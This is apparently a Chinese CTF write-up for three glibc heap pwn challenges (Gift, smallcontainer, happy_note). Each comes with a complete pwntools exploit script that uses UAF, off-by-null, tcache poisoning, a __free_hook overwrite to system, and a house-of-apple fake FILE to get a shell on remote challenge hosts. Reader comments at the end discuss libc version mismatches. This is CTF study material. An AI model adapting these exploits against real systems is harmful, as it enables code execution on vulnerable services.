不得不说,icq的比赛🍉就是多
Gift
2.31的UAF,没有edit功能
通过bargain还价修改fd,伪造一条tcache的链来做到任意地址分配
注意到还的价格可以为负数,这样就可以避免0x10的限制而是将fd指针指向自身chunk内
from pwn import*
# Remote instance used by the write-up; swap in the commented process() line for a local run.
r = remote("123.56.45.214", 44298)
# r = process('./pwn')
context.log_level = 'debug'  # echo every byte exchanged on the tube
def new(size, content):
    """Menu choice 2 ("new"): answer the size prompt, then send `content` raw.

    `content` goes through send(), not sendline(), so the caller decides
    whether a trailing newline is part of the data.
    """
    prompt = "your choice:\n"

    def answer(line):
        # the menu choice and the size are both asked for with the same prompt
        r.recvuntil(prompt)
        r.sendline(line)

    answer("2")
    answer(str(size))
    r.recvline()        # the content prompt is a plain line, not "your choice:"
    r.send(content)
def delete(idx):
    """Menu choice 3 ("delete") on slot `idx`."""
    sendline = r.sendline
    r.recvuntil("your choice:\n")
    sendline("3")
    r.recvline()            # index prompt
    sendline(str(idx))
def show(idx):
    """Menu choice 4 ("show") on slot `idx`; the caller reads the reply itself."""
    choice, slot = "4", str(idx)
    r.recvuntil("your choice:\n")
    r.sendline(choice)
    r.recvline()            # index prompt
    r.sendline(slot)
def gift(idx, size):
    """Menu choice 5 ("gift", the write-up's bargain): slot `idx`, then the value `size`.

    `size` is sent via str(), so a negative value such as -0x10 is delivered
    as "-16"; the write-up relies on the service accepting that.
    """
    r.recvuntil("your choice:\n")
    r.sendline("5")
    for value in (idx, size):
        r.recvline()        # one prompt line precedes each answer
        r.sendline(str(value))
# NOTE(review): str + p64() concatenation below only works with Python 2-era
# pwntools (p64 returns bytes on Python 3); run it under the interpreter the
# write-up used. Every numeric offset is specific to one libc build — see the
# reader comments at the end of the page about 2.27 vs 2.31.

# Stage 1: heap leak. Two 1-byte slots, free both, then "show" slot 1; the
# "cost:" value of the freed slot is evidently a heap pointer, which the author
# rebases by 0x260 to get the heap start.
new(1,"\n")
new(1,"\n")
delete(0)
delete(1)
show(1)
r.recvuntil("cost: ")
heap=int(r.recvline())-0x260
success("heap: "+hex(heap))
# Stage 2 (per the write-up): heap-relative pointers are planted in two
# allocations, both are freed, and the negative "bargain" gift(1,-0x10)
# rewrites the freed chunk's fd so that the following allocations land at
# chosen heap addresses.
new(1,"\x00"*0x10+p64(heap+0x400)+"\x00"*0x68+p64(heap+0x410))
new(1,p64(heap+0x390))
delete(0)
delete(1)
gift(1,-0x10)
new(1,"\n")
new(1,"\n")
new(1,"\x00")
# Stage 3: libc leak through the same "cost:" field after freeing slot 0.
# 0x3ebca0 is the leaked pointer's distance from libc base for the intended
# build only — a different build yields a wrong base, as the thread below notes.
delete(0)
show(0)
r.recvuntil("cost: ")
libc_base=int(r.recvline())-0x3ebca0
success("libc_base: "+hex(libc_base))
# Stage 4: a libc address (libc_base+0x3ed8d8) is written into one allocation
# and a second libc address (libc_base+0x4f302) into the one after it; the
# page does not say which symbols these offsets stand for. delete(8) is the
# final free that triggers the chain.
new(1,p64(libc_base+0x3ed8d8))
new(1,"\n")
new(1,p64(libc_base+0x4f302))
delete(8)
#gdb.attach(r)
r.interactive()
smallcontainer
生硬的off by null,检测到\x11就置为\x00
还是2.27的libc,没有prev_size检测,常规方法造uaf即可
from pwn import*
# Remote instance used by the write-up; swap in the commented process() line for a local run.
r = remote("123.56.121.45", 23924)
# r = process('./smallcontainer')
context.log_level = 'debug'  # echo every byte exchanged on the tube
libc = ELF("./libc-2.27.so")  # symbol offsets below are resolved from this exact build
def new(size):
    """Menu choice 1 ("new"): request a slot of `size` bytes."""
    for prompt, reply in (("> ", "1"), (": ", str(size))):
        r.recvuntil(prompt)
        r.sendline(reply)
def delete(idx):
    """Menu choice 2 ("delete") on slot `idx`."""
    for prompt, reply in (("> ", "2"), (": ", str(idx))):
        r.recvuntil(prompt)
        r.sendline(reply)
def edit(idx, content):
    """Menu choice 3 ("edit"): select slot `idx`, then send `content` raw (no newline added)."""
    for prompt, reply in (("> ", "3"), (": ", str(idx))):
        r.recvuntil(prompt)
        r.sendline(reply)
    r.send(content)
def show(idx):
    """Menu choice 4 ("show") on slot `idx`; the caller parses the reply."""
    choice, slot = "4", str(idx)
    r.recvuntil("> ")
    r.sendline(choice)
    r.recvuntil(": ")       # index prompt
    r.sendline(slot)
# NOTE(review): Python 2-era pwntools (str + p64() mixing). libc offsets come
# from ./libc-2.27.so via libc.sym, so only the leak-to-__malloc_hook delta
# (0x70) is hard-coded.

# Stage 1: heap layout. Ten 0x208 slots, free 3..9, reuse that space with
# seven 0x1F8 slots, free 3..9 again, then free slot 0.
for i in range(10): new(0x208)
for i in range(3,10): delete(i)
for i in range(7): new(0x1F8)
for i in range(3,10): delete(i)
delete(0)
# Stage 2: the off-by-null (write-up: a 0x11 byte is turned into 0x00).
# Slot 2's fill ends with a size field of 0x221; slot 1 is first written
# full (0x208 bytes, presumably to trigger the null write), then rewritten
# with 0x420 at offset 0x200 before slot 2 is freed.
edit(2,"a"*0x1F8+p64(0x221))
edit(1,"a"*0x208)
edit(1,"a"*0x200+p64(0x420))
delete(2)
# Stage 3: take the seven same-size slots back, allocate once more, and
# show(1) now prints a libc pointer as hex text; it is read up to the banner
# string and rebased against __malloc_hook minus 0x70.
for i in range(7): new(0x208)
new(0x208)
show(1)
libc_base=int(r.recvuntil("This is a cyber container",drop=True),16)-libc.sym["__malloc_hook"]-0x70
success("libc_base: "+hex(libc_base))
# Stage 4: slot 1's content is set to the address of __free_hook, two more
# 0x108 allocations follow, slot 10 (evidently the one placed at __free_hook)
# receives system, and freeing slot 0 ("/bin/sh\n") is the trigger.
new(0x108)
delete(9)
edit(1,p64(libc_base+libc.sym["__free_hook"]))
new(0x108)
new(0x108)
edit(10,p64(libc_base+libc.sym["system"]))
edit(0,"/bin/sh\n")
delete(0)
#gdb.attach(r)
r.interactive()
happy_note
2.34版本,一次UAF机会
常规泄漏之后,直接house of apple完事
from pwn import*
# Remote instance used by the write-up; swap in the commented process() line for a local run.
r = remote("182.92.74.66", 17827)
# r = process('./happy_note')
context.log_level = 'debug'  # echo every byte exchanged on the tube
libc = ELF("./libc.so.6")  # only _IO_list_all is resolved from it; other offsets are hard-coded below
def new(idx, size, mode):
    """Menu choice 1 ("new"); the service prompts for size, then idx, then mode."""
    r.recvuntil(">> ")
    r.sendline("1")
    # note the order differs from the parameter order: size is asked first
    for answer in (size, idx, mode):
        r.recvline()
        r.sendline(str(answer))
def delete(idx):
    """Menu choice 2 ("delete") on slot `idx`."""
    sendline = r.sendline
    r.recvuntil(">> ")
    sendline("2")
    r.recvline()            # index prompt
    sendline(str(idx))
def show(idx):
    """Menu choice 3 ("show") on slot `idx`; the caller reads the "content:" line itself."""
    choice, slot = "3", str(idx)
    r.recvuntil(">> ")
    r.sendline(choice)
    r.recvline()            # index prompt
    r.sendline(slot)
def edit(idx, content):
    """Menu choice 4 ("edit"): select slot `idx`, then send `content` raw (no newline added)."""
    r.recvuntil(">> ")
    r.sendline("4")
    for step in (lambda: r.sendline(str(idx)), lambda: r.send(content)):
        r.recvline()        # one prompt line before the index and before the data
        step()
def gift(idx):
    """Hidden menu choice 666 ("gift") on slot `idx`."""
    choice, slot = "666", str(idx)
    r.recvuntil(">> ")
    r.sendline(choice)
    r.recvline()            # index prompt
    r.sendline(slot)
def xor(ptr1, ptr2):
    """Return (ptr1 >> 12) ^ ptr2 — the pointer mangling this script applies to fd values."""
    shifted = ptr1 >> 12
    return shifted ^ ptr2
# NOTE(review): Python 2-era pwntools (str.ljust(..., "\x00") applied to the
# p64/u64 path). 0x219cc0, 0x2160c0, 0xeacef, 0xc20 and heap+0xf30 are
# hard-coded offsets for the specific ./libc.so.6 and binary build used here;
# only _IO_list_all is resolved from symbols.

# Stage 1: libc leak. Eleven 0x108 slots, free 0..6, then gift(7) + show(7)
# print a pointer in "content:"; 0x219cc0 rebases it to libc base.
for i in range(11): new(i,0x108,1)
for i in range(7): delete(i)
gift(7)
show(7)
r.recvuntil("content: ")
libc_base=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-0x219cc0
success("libc_base: "+hex(libc_base))
_IO_wfile_jumps=libc_base+0x2160c0   # hard-coded; libc.sym would be the build-checked alternative
# Stage 2: heap leak through the one UAF the write-up mentions — slot 0 is
# reallocated, slots 9 and 7 are freed, and show(0) now prints a heap
# pointer, rebased by 0xc20.
new(0,0x100,1)
delete(9)
delete(7)
show(0)
r.recvuntil("content: ")
heap=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-0xc20
success("heap: "+hex(heap))
# Stage 3: two 0xE8 slots are freed back-to-back, then slot 0's content is
# overwritten with the mangled form ((heap>>12)^target, see xor()) of
# _IO_list_all, so that the second mode-2 allocation evidently lands there.
new(2,0x100,1)
new(3,0xE8,1)
new(4,0xE8,1)
delete(4)
delete(3)
edit(0,p64(xor(heap,libc_base+libc.sym["_IO_list_all"])))
new(5,0xE8,2)
new(6,0xE8,2)
new(7,0x200,1)
# Stage 4: fake FILE object for the "house of apple" path named in the
# write-up, assembled by absolute offset: +0x18 = 1, +0x58 = libc_base+0xeacef,
# +0x90 and +0xd0 = heap+0xf30 (presumably slot 7's own buffer),
# +0xc8 = _IO_wfile_jumps. Slot 6 (at _IO_list_all) is then pointed at it.
fake_IO_struct=""
fake_IO_struct=fake_IO_struct.ljust(0x18,"\x00")
fake_IO_struct+=p64(1)
fake_IO_struct=fake_IO_struct.ljust(0x58,"\x00")
fake_IO_struct+=p64(libc_base+0xeacef)
fake_IO_struct=fake_IO_struct.ljust(0x90,"\x00")
fake_IO_struct+=p64(heap+0xf30)
fake_IO_struct=fake_IO_struct.ljust(0xc8,"\x00")
fake_IO_struct+=p64(_IO_wfile_jumps)
fake_IO_struct=fake_IO_struct.ljust(0xd0,"\x00")
fake_IO_struct+=p64(heap+0xf30)
edit(7,fake_IO_struct)
edit(6,p64(heap+0xf30))
#gdb.attach(r,"b _IO_wdoallocbuf")
delete(9)   # final free that triggers the chain (the commented breakpoint hints at the path taken)
r.interactive()
师傅Gift那题libc泄露有问题吧
我用的是glibc2.31的,所以打不通,打扰了
Gift这题glibc应该是2.27的